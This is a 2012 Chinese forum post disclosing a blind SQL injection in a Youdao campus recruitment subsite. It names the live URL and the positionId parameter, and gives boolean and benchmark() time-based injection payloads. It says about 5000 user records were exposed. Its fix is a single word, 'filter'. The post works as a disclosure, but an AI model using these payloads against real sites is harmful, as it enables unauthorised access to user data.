首页>网络技术>网站安全>网易有道某分站盲注及修复
回复
« 返回列表
灯火互联
灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
写私信 打招呼
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2195回复:0

网易有道某分站盲注及修复

楼主#
更多 发布于:2012-11-14 11:21
网易有道某分站盲注,导致用户信息泄漏地址:http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1

漏洞的参数是positionId,用and语句判断存在SQL注入。

http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1 and 1=1 返回正确
http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1 and 1=2 返回错误

图片:20121114105402593.jpg



然后用benchmark函数判断存在盲注,明显有延时。

http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1 and if(1,benchmark(500000,md5(1)),1)


图片:20121114105402491.jpg





大概5000+用户信息。


修复方案:

过滤

喜欢0 评分0
淘宝天猫隐藏优惠券地址
回复
游客

Powered by atcpu.com ©2008-2021

灯火互联网 蜀ICP备13028548号

手机认证个人空间个人相册音乐电台音乐畅听网站终身会员手机吉凶在线YY百宝箱
返回顶部